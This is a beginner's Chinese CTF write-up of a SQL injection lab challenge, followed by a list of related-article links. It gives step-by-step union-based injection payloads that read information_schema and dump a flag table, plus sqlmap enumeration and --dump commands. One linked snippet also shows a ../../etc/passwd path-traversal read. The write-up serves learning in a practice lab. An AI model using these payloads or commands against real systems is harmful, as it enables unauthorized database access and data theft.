前言:

我是新手小白,创建此文章只为了记录自己的学习

题目:

我们先进入环境,既然是sql注入,那就可以通过手工或者sqlmap来进行注入

手工方法:

题目已经明确告诉我们是SQL注入了,我们直接就看一下哪里会存在注入点。

网址存在id=1,可能存在注入点,手工一下看看是否存在。

先用 ' 试一下,返回了一个错误页面,再用and 1=1 试一下,返回正确的页面,再次试一下and 1=2,返回的是错误的页面,那么即可注入;

and 1=1返回一个错误页面?会不会是' 后面把and 1=1闭合掉了?

尝试一下把后面注释掉看看是否是闭合掉了:使用--+看一下;

返回了正确的页面,可以确定后面是有闭合的;

既然知道有了闭合和注入,下面开始查询一下输出位:

先构造order by 函数判断一下列数,建议使用二分法,我喜欢从十开始,这边直接看结果吧;

order by 3回显正确,说明列数是3;下面构造函数确定输出位:union select 1,2,3

既然知道了回显位置,下面就构造函数查库、表、列了。

查库:union select 1,database(),3 --+

查表:union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='note'  --+           //note是上面库的名

查列: union select 1,group_concat(column_name),3 from information_schema.columns where table_name='fl4g'  --+          //fl4g是上面查询到的表

查看记录就能得到flag了:union select 1,group_concat(fllllag),3 from fl4g --+    //fllllag是上面查询到的

上面就是手工方式解出flag的步骤,下面写sqlmap跑法

sqlmap

直接用sqlmap -u 检测一下

是存在注入的;

sqlmap  -u URL --dbs --batch //获取全部数据库

sqlmap -u URL --current-db --batch //获取当前数据库

sqlmap -u URL -D 数据库名 --tables --batch //获取当前数据库里所有表

sqlmap -u URL -D 数据库名 -T 表名 --columns --batch //获取表的字段

sqlmap -u URL -D 数据库名 -T 表名 -C "字段内容" --dump --batch //dump字段内容

如果字段内容多的话可以再加上如 --start 1 --stop 100 这样就取1-100条数据

--dump 可以换成 --dump-all则导出全部的内容

按照这个步骤一步一步下来就好了,截图我放下面了:

以上就是本次的flag :n1book{union_select_is_so_cool}

手注十分繁琐,可以使用sqlmap方便一点

《从0到1:CTFer成长之路》SQL注入-1相关推荐

  1. 从0到1:CTFer成长之路

    作者:Nu1L战队 出版社:电子工业出版社 品牌:电子工业出版社 出版时间:2020-10-01 从0到1:CTFer成长之路

  2. 《从0到1:CTFer成长之路》 [第一章 web入门] 常见的搜集

    <从0到1:CTFer成长之路> [第一章 web入门] 常见的搜集 启动环境: 提示为敏感文件,首先对网站目录进行扫描: 得到如上页面,首先访问robots.txt页面: 得到flag1 ...

  3. 《从0到1:CTFer成长之路》书籍配套题目-[第一章 web入门]SQL注入-2

    [第一章 web入门]SQL注入-2 一.信息收集 1.首页 2.登录成功会跳转到 3.进行测试判断 二.尝试破解 1.用post型的sqlmap破解 <1>.首先,开burp截包 < ...

  4. 从0到1:CTFer成长之路docker环境搭建

    1. 安装 docker 使用官方安装脚本安装 sudo curl -fsSL https://get.docker.com | bash -s docker --mirror Aliyun 也可以使 ...

  5. 【代码审计】iCMS_v7.0.7 admincp.app.php页面存在SQL注入漏洞分析

      0x00 环境准备 iCMS官网:https://www.icmsdev.com 网站源码版本:iCMS-v7.0.7 程序源码下载:https://www.icmsdev.com/downloa ...

  6. 【代码审计】iCMS_v7.0.7 apps.admincp.php页面存在SQL注入漏洞分析

      0x00 环境准备 iCMS官网:https://www.icmsdev.com 网站源码版本:iCMS-v7.0.7 程序源码下载:https://www.icmsdev.com/downloa ...

  7. 【代码审计】iCMS_v7.0.7 search.admincp.php页面存在SQL注入漏洞

      0x00 环境准备 iCMS官网:https://www.icmsdev.com 网站源码版本:iCMS-v7.0.7 程序源码下载:https://www.icmsdev.com/downloa ...

  8. 【代码审计】iCMS_v7.0.7 keywords.admincp.php页面存在SQL注入漏洞分析

      0x00 环境准备 iCMS官网:https://www.icmsdev.com 网站源码版本:iCMS-v7.0.7 程序源码下载:https://www.icmsdev.com/downloa ...

  9. CTF学习记录 i春秋 《从0到1:CTFer成长之路》文件上传

    21.10.19 第二次开始学习CTF 感觉很有收获 至少有让自己忙起来了的感觉 感觉有一些学习状态了 打算重新记录一下学习笔记!加油 我会坚持下去的! 题目代码 首先附上题目的代码段(不完整) sh ...

  10. 《从0到1:CTFer成长之路》书籍配套题目--afr_3 BUUCTF

    还是任意文件读取漏洞 进入坏境 点入链接 这边可以读取文件 试一试article?name=../../../etc/passwd 读不到flag /proc详解 linux进程与它的文件描述符./p ...

最新文章

  1. ImportError: cannot import name ‘image‘ from ‘PIL‘ (C:\ProgramData\Anaconda3\lib\site-packages\PIL\_
  2. Linu解决oracle连接不稳定
  3. 老子《道德经》第三十三章
  4. Linux 实现网页劫持,Linux下实现劫持系统调用的总结(上)--代码及实现
  5. 算法题解:旋转数组的最小数字
  6. JAVA50道经典编程题
  7. cas单点登录-https的配置(一)
  8. 蓝桥杯 ADV-65 算法提高 格子位置
  9. 找回 Windows 11 丢失的扫雷游戏【新春快乐】
  10. ORACLE11gR2安装XDB
  11. 凯文·凯利又出预言:未来科技将由这四股力量推动!
  12. ERP标准物料编码规则指南
  13. 【快讯通知】江苏省2022年度社会保险有关基数通知
  14. windows命令行XCOPY命令
  15. MATLAB之傅里叶展开(五)
  16. C/C++黑魔法-字符串分割
  17. H.266/VVC代码学习21:帧内角度预测的实现 / 近对角模式的PDPC(xPredIntraAng)
  18. ImageNet的top-1终于上了90%,然而谷歌却遭众网友吐槽
  19. SSM实现点餐系统(含源码)
  20. Linux 交叉编译

热门文章

  1. 驱动启动时遇到:打开服务失败(错误码=6):句柄无效 解决方案
  2. 退出android recovery界面,怎么退出recovery模式?
  3. regeneratorRuntime is not defined
  4. 直播视频卡顿延迟时如何优化
  5. NuPlayer源码分析三:解码模块
  6. Qt添加工具栏按钮————附详细步骤
  7. 牛魔王珍满福拉面 - 北京团购网|京东团购
  8. 我爱淘二次冲刺阶段5
  9. GTX高速收发器Transceiver之发射端Transmitter(UG476)
  10. Hugo博客双线部署